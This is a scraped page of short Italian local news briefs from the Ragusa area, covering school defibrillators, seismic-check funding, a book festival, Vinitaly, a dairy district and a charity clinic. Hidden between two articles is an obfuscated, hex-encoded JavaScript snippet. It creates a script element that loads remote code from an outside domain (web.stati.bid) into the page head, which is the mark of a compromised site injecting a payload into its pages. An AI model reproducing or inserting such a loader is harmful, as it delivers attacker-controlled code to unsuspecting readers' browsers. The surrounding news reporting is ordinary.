Nino Minardo

Proposta di legge per la diffusione dell’uso dei defibrillatori semiautomatici

MODICA (di Elisa Montagno) – Una proposta di legge che rappresenta il primo passo per consentire la diffusione dell’uso dei defibrillatori semiautomatici esterni anche a personale non sanitario, opportunamente formato, proprio nella convinzione che l’utilizzo di tale apparecchiatura possa prevenire o quanto meno ridurre il numero di morti per arresto cardiocircolatorio. Questi i contenuti del progetto legislativo dell’onorevole Nino Minardo che reca “Disposizioni in materia di dotazione di defibrillatori semiautomatici ed eventuali altri dispositivi salvavita, nelle scuole di ogni ordine e grado e nelle Università”. “Nel nostro Paese le vittime di arresto cardiaco sono oltre 60-70 mila ogni anno, e circa l’80 per cento dei decessi avviene a casa, negli uffici pubblici, nelle strade, sul lavoro, ossia lontano da strutture sanitarie e ospedali. Molto spesso i sistemi di soccorso hanno purtroppo tempi d’intervento troppo lunghi rispetto al necessario, e questo anche a causa delle distanze e del traffico cittadino, mentre, nel caso di arresto cardiaco, il fattore tempo è decisivo. In diverse province italiane sono attivi progetti che prevedono la collocazione sul territorio di postazioni di defibrillazione ad accesso pubblico. Attualmente vige l’obbligo di dotazione ed impiego di defibrillatori semiautomatici e altri dispositivi salvavita, per le società sportive dilettantistiche. Con la presente proposta di legge, si prevede che in ogni struttura scolastica e ogni università sia presente un defibrillatore semiautomatico ed eventuali altri dispositivi salvavita. Peraltro giova sottolineare come all’interno delle scuole si svolgono regolarmente attività sportive. Ho presentato questa proposta di legge, prosegue Minardo, con la ferma convinzione che anche “il defibrillatore deve andare a scuola”. “La sicurezza che regala questo strumento si riflette anche in maggior serenità di insegnati e personale scolastico ed è un ottimo “alleato salvavita”.
Leggi tutto
Provincia Ragusa

Più di 1 milione di euro per l’edilizia scolastica

RAGUSA (di Elisa Montagno) – Un milione e 776 mila euro da parte della Regione siciliana per la verifica antisismica degli edifici scolastici di competenza del Libero Consorzio Comunale di Ragusa.
E’ stata pubblicata la graduatoria provvisoria per l’assegnazione dei contributi per l’esecuzione di indagini diagnostiche e effettuazione delle verifiche sismiche degli edifici scolastici a valere sull’azione 10.7.1 del PO FESR Sicilia 2014/2020.
Il Libero Consorzio Comunale di Ragusa aveva detto presentato numerose istanze di finanziamento e dall’esame della graduatoria risultano ammesse tutt’e 48 quelle presentate) per un ammontare complessivo di euro 1.776.225,00. Ad essere interessati da questo finanziamento sono nella quasi totalità tutti gli edifici scolastici di competenza dell’Ente ma il maggiore finanziamento riguarda l’Istituto ‘Galileo Ferraris’ di Ragusa per una somma di 82 mila 756 euro, seguito dall’Istituto Tecnico ‘Fermi’ di Vittoria per 75 mila e 639 euro nonché dall’Istituto Professionale Archimede di Modica per una somma di 62 mila e 505 euro. Ma le indagini diagnostiche e l’effettuazione delle verifiche sismiche interesseranno quasi tutti gli edifici principali degli istituti scolastici e le sezioni staccate.
“Appena verranno notificati gli esiti definitivi dell’approvazione dei progetti – dice il Commissario straordinario del Libero Consorzio Comunale di Ragusa, Salvatore Piazza – saranno firmate le convenzioni con la Regione siciliana per l’attuazione della misura. Le verifiche interesseranno la stragrande maggioranza degli edifici scolastici di competenza e sarà l’occasione per verificare lo stato di salute dei nostri edifici scolastici, oltre la possibilità di programmare gli interventi necessari per l’adeguamento sismico degli stessi. E’ un primo passo verso la mappatura del rischio sismico e la relativa programmazione finalizzata alla riduzione dello stesso, rendendo più sicure le strutture scolastiche di competenza. Il fatto che su 48 istanze presentate ne sono state finanziate altrettante questo va di sicuro a merito del settore ‘Lavori pubblici e infrastrutture’ diretto dall’ingegnere Carlo Sinatra che ha prodotto questo corposo lotto di progetti”.
Leggi tutto
file-12 (5)

Grande presenza di pubblico per il festival “A Tutto Volume”

RAGUSA (di Elisa Montagno) – In migliaia nelle piazze di Ragusa per assistere alla presentazione dei libri pubblicati nell’ultimo anno da autori e scrittori italiani e stranieri. Una formula semplice ma al tempo stesso di successo, che da ben nove anni è capace di attirare un pubblico sempre crescente, numeroso, attento, appassionato. E’ il festival letterario “A Tutto Volume – libri in festa a Ragusa” che riesce ad attirare lettori e visitatori in arrivo da tutta la Sicilia ma anche dal resto d’Italia per assistere ai tantissimi incontri che si susseguono durante questo fine settimana, più di 70 tra quelli del programma ufficiale e gli “Extravolume”, eventi promossi direttamente da associazioni e privati del territorio. Un festival che riesce a sfidare anche l’inaspettata pioggia, superando ogni difficoltà e mantenendo invariato il programma, come accaduto all’incontro inaugurale in piazza San Giovanni con la scrittrice Daria Bignardi. Successo di pubblico per tutti gli appuntamenti del festival, ideato e curato dal direttore artistico Alessandro Di Salvo, che riesce a coinvolgere tutta la città in un’atmosfera di vera e propria festa.
Leggi tutto
ragsua postazieone dae

Ragusa, nuova postazione DAE in piazza Cappuccini

RAGUSA (di Elisa Montagno ) – È stata inaugurata ieri in Piazza Cappuccini una postazione DAE (defebrillatore automatico esterno). Grazie alla generosità del club service Lions Ragusa Host e dell’associazione Amunì che hanno chiesto al Comune di Ragusa di accettare la donazione della postazione DAE, è stato possibile installare in Piazza Cappuccini un nuovo strumento “salvavita”.
Alla cerimonia di inaugurazione oltre ai rappresentanti delle associazioni che hanno donato la postazione DAE è stato presente il sindaco Federico Piccitto. Il primo cittadino ha pubblicamente ringraziato chi ha consentito di dotare uno nuovo spazio pubblico di un defibrillatore automatico che renderà così la città sempre più cardio protetta.
Leggi tutto
festa dello sport

Mercoledì si conclude la Festa dello sport alle “Masserie” con il cambio cintura

RAGUSA (di Elisa Montagno) – Torna uno dei momenti più attesi. Quello per cui si è lavorato una intera stagione, destinato ad accrescere il peso specifico dell’attività svolta. E’ la festa del cambio cintura che, promossa dalla scuola Basaki di Ragusa, si terrà mercoledì 13 giugno al centro commerciale Le Masserie di via Achille Grandi a partire dalle 17. Duecento atleti di judo, tra piccoli e grandi, tutti attenti a seguire i corsi invernali della prestigiosa scuola iblea, si ritroveranno tutti assieme, guidati dal maestro Salvo Baglieri e dagli altri istruttori, per celebrare la conclusione della stagione e per compiere un ulteriore passo avanti nel “cursus honorum” predisposto dallo staff tecnico nel tentativo di raggiungere livelli sempre più elevati. Un percorso davvero speciale che, durante la stagione, è stato caratterizzato anche dalla presenza della campionessa olimpionica Ylenia Scapin che, anche stavolta, sarà ospite speciale dell’evento.
Leggi tutto
vinitaly

Vinitaly, ottima vetrina per le eccellenze iblee

Vinitaly, ottima vetrina per le eccellenze iblee
RAGUSA (di Elisa Montagno) – Da Verona una significativa spinta per il rilancio e l’ulteriore valorizzazione del progetto “eccellenze Iblee agroalimentari” sostenuto dai consorzi di tutela dell’olio dop Montiblei, del formaggio Ragusano Dop, del vino Cerasuolo di Vittoria docg e della carota novella igp di Ispica. Le iniziative comuni messe in campo in occasione del Vinitaly e del contestuale Sol impongono una forte determinazione per azioni proporzionate alle esigenze promozionali dei prodotti di qualità con marchio comunitario ed inscindibilmente legati al territorio ibleo. Anche le interlocuzioni coi massimi vertici regionali si sono rivelati promittenti: dagli incontri avuti con l’assessore Edy Bandiera e con il dirigente generale del dipartimento agricoltura Carmelo Firtitta, sono emerse delle disponibilità sicuramente interessanti per la individuazione di percorsi per il riconoscimento e la valorizzazione dei consorzi di secondo grado. La Regione, infatti, può e deve dare valore alla aggregazione dei vari consorzi di tutela per dare peso e valore ai prodotti attraverso la esaltazione del loro legame ai territori di provenienza. Grande interesse hanno richiamato, nel padiglione della Regione Sicilia, gli stands dove i produttori e le cantine hanno esposto, presentato e fatto degustare il vino cerasuolo di vittoria docg. Altrettanto può dirsi dell’olio dop montiblei , grazie alla presenza al Sol delle tante aziende del nostro presenti e dal qualificato ruolo del consorzio di tutela che, d’intesa con la Regione e con la presenza dell’assessore Edy Bandiera, ha, tra l’altro, organizzato e dato vita ad una degustazione che ha richiamato l’interesse dei buyer e di tanti esperti che con la loro partecipazione hanno qualificato l’importante appuntamento. Particolarmente apprezzata anche l’iniziativa della cantina Rudinì di Pachino che ha presentato i propri vin ed in particolare il Moscato di Noto in abbinamento col cioccolato di Modica e col formaggio Ragusano dop: un vero successo.
L’occasione del Vinitily è stata utile per i rappresentanti dei consorzi di tutela operanti nell’area iblea (presenti con Massimo Maggio per il Cerasuolo di Vittoria docg, Enzo Cavallo per il Ragusano Dop e per Giuseppe Arezzo per l’olio montiblei Dop) che hanno potuto trovarsi insieme per definire alcuni aspetti organizzativi riguardanti la loro aggregazione ed una serie di percorsi promozionali per proseguire un cammino che sta dando, e darà sempre di più, risultati sicuramente importanti e significativi per gli imprenditori impegnati a produrre prodotti di qualità e per l’intera economia del territorio ibleo.
Leggi tutto
file-4

Il Commissario Piazza incontra i rappresentanti del distretto lattiero caseario

RAGUSA (di Elisa Montagno) – Il commissario straordinario del Libero Consorzio Comunale, Salvatore Piazza, ha ricevuto la visita dei rappresentanti Iblei del DiProSiLaC (Distretto produttivo lattiero caseario regionale), Enzo Cavallo, Saro Petriglieri ed Enzo Covato. Durante il cordiale incontro è stato fatto il punto sullo stato dell’arte dei Distretti in Sicilia e si è condivisa l’analisi che il loro destino è direttamente legato alla volontà ed alla capacità della Regione siciliana che deve dare concretezza ai propositi scaturenti dalla legge istitutiva ed alla valorizzazione di tali aggregazioni quali “cabina di regia” delle varie filiere produttive con particolare riferimento a quelle agroalimentari.
L’incontro è stato anche utile per chiarire che il DiProSiLaC, costituito nel 2008 e riconosciuto nel 2012, è scaduto nell’agosto del 2016 ma senza essere mai stato messo nelle condizioni di poter accedere ai fondi comunitari per il fatto che la Regione non ha emanato alcun bando cui poter partecipare nell’interesse delle imprese e della filiera. Dal confronto è emersa la volontà del Commissario Piazza di rilanciare il ruolo dei distretti e di quello lattiero caseario in particolare (tenuto conto dell’importanza produttiva, economica ed occupazionale della filiera per il territorio ibleo) e la disponibilità dell’ente non solo ad ulteriormente ospitare l’organismo nella propria sede ma altresì a coordinare le procedure e le azioni per procedere al rinnovo del “patto di sviluppo distrettuale” in sintonia con le altre province siciliane che manifesteranno il loro interesse e con gli altri Distretti Produttivi dell’Agroalimentare parimenti interessati. E’ stato deciso comunque di subordinare ogni passaggio agli esiti degli incontri istituzionali già concordati col Presidente della terza commissione Attività Produttive dell’Ars, Orazio Ragusa e gli assessori regionali all’Agricoltura Edy Bandiera e alle Attività Produttive Girolamo Turano.
“La Regione è chiamata a dare una prospettiva ai distretti produttivi istituiti con la legge regionale 17/2004 – afferma Salvatore Piazza – ed il Libero Consorzio Comunale è pronto a fare la sua parte per mettere i rappresentanti della filiera nella condizione di giungere al rinnovo del “patto distrettuale” riconosciuto dall’Assessorato Regionale delle Attività Produttive nel 2012 e del quale l’ex Provincia Regionale è stato Ente capo-fila. Personalmente credo di dover affrontare la questione direttamente col Presidente della Regione”.
“Il Distretto, oltre che per l’accesso ai fondi comunitari come avviene nelle altre Regioni, può fungere – dice Enzo Cavallo, a conclusione dell’incontro col Commissario Piazza – da “cabina di regia” di una filiera che ha tanto bisogno di un coordinamento istituzionale. Insieme ai rappresentanti degli altri Distretti siciliani dell’Agroalimentare intendiamo verificare la reale volontà del nuovo Governo Regionale”.

var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

Leggi tutto
alunni disabili sensoriali incontro

Verifica stato del servizio per alunni disabili sensoriali

RAGUSA (di Elisa Montagno) – Il confronto con tutti gli assessori alle Politiche sociali dei comuni iblei ha permesso di verificare lo stato del servizio di assistenza per gli alunni disabili sensoriali in provincia di Ragusa. Il tentativo del Commissario straordinario Salvatore Piazza, sollecitato la scorsa settimana dai genitori degli alunni con disabilità sensoriale che avevano chiesto soprattutto l’assistenza pomeridiana, rinunciando a quella scolastica perché ‘coperta’ dal docente di sostegno, era finalizzato ad eliminare le criticità che si erano verificate nel passaggio di competenze del servizio dal Libero Consorzio Comunale di Ragusa ai Comuni per gli alunni disabili della scuola dell’obbligo.
Presenti quasi tutti gli assessori comunali alle Politiche sociali è emerso che il servizio per gli alunni disabili sensoriali viene assicurato nelle ore pomeridiane in tutti i Comuni, ad eccezione di Modica e Ragusa. Da qualche giorno il servizio è partito anche a Vittoria che ha deliberato l’attivazione dell’attività extrascolastica. Il comune di Ragusa ha rappresentato la difficoltà di non poter commutare le ore di assistenza attività scolastica in assistenza attività extrascolastica avendo già chiuso il bando di affidamento del servizio.
Il Commissario Piazza ha chiesto a tutti i presenti uno sforzo straordinario per venire incontro alle esigenze dei genitori di questi alunni penalizzati in quest’anno scolastico dal passaggio delle competenze dalle ex Province ai Comuni.
Leggi tutto
CONVEGNO FORMAZIONE

Convegno di formazione per gli insegnanti di religione a Ragusa

RAGUSA (di Elisa Montagno) – Un convegno di aggiornamento e formazione ricco di tematiche incentrate sul problema della relazione educativa nella scuola, quello che ha coordinato a Ragusa Domenico Pisana all’Istituto Ferraris. A relazionare, dopo l’apertura dei lavori da parte della professoressa Marisa Scivoletto e i saluti del vicario della diocesi di Ragusa, Mons. Asta, e del professore Carmelo La Porta, con-direttore dell’Ufficio IRC, sono stati Don Fortunato Di Noto e la dottoressa Mariella Marotta dell’associazione Meter.
Il primo ha parlato delle sfide educative nella scuola che cambia, mentre la Marotta si è soffermata sugli aspetti psico-pedagogici della relazione educativa e sulle metodologie di intervento di fronte ai fenomeni del bullismo e del cyberbullismo. La seconda parte del corso è stata dedicata alle questioni giuridiche degli Insegnanti di Religione e al nuovo concorso in programma, con un’ampia e approfondita relazione del segreteranio nazionale delllo Snadir, professore Orazio Ruscica. Un dibattito molto partecipato ha concluso i lavoro del corso.
Leggi tutto
ambulatorio solidale

Ragusa, l’Ambulatorio solidale è una realtà

RAGUSA – Una realtà importante che è nata dalla collaborazione tra l’ufficio Caritas, l’ufficio di Pastorale della salute, la parrocchia San Pietro, l’ordine medici e farmacisti e il Rotary di Ragusa. Stiamo parlando dell’ambulatorio solidale inaugurato ieri nei locali della parrocchia San Pietro di Via Lazio a Ragusa. E’ stato il vescovo, Mons. Carmelo Cuttitta a presiedere l’inaugurazione del nuovo presidio che ha come primo obiettivo quello di essere un ‘centro di ascolto sanitario’ con funzione di consulenza e orientamento per tutte quelle persone che non sanno come accedere ai servizi ambulatoriali o non possono permettersi il pagamento di visite specialistiche urgenti. Un ambulatorio che offre, dunque, consulenze in collaborazione con le istituzioni sanitarie e dove si forniranno gratuitamente farmaci di base. Nel corso dell’inaugurazione è stato ribadito che l’Ambulatorio solidale non è una risposta autosufficiente, ma vuole far parte di un processo più ampio di presa in carico delle persone, attuato con i centri di ascolto, le parrocchie, i servizi di accoglienza e di prossimità. Per tale motivo, anche l’accesso all’Ambulatorio solidale è concordato con queste realtà che accompagnano le persone a livello sociale (Parrocchie, Istituti Religiosi, centri d’ascolto, Conferenze San Vincenzo, Vo.cri).

 

Leggi tutto
TELERADIO REGIONE S.R.L., società a socio unico soggetta a direzione e coordinamento della Filgest srl, 97015 Modica – S.P. 74 km 0+400 C.da Cava Gucciardo – C.F. e P.IVA 00209070895 – Capitale Sociale Euro 2.255.000 i.v. - CCIAA / REA Ragusa 110483 – Testata Giornalistica igiornalidisicilia.it nr. 3/2012 del 26.04.2012 Tribunale di Modica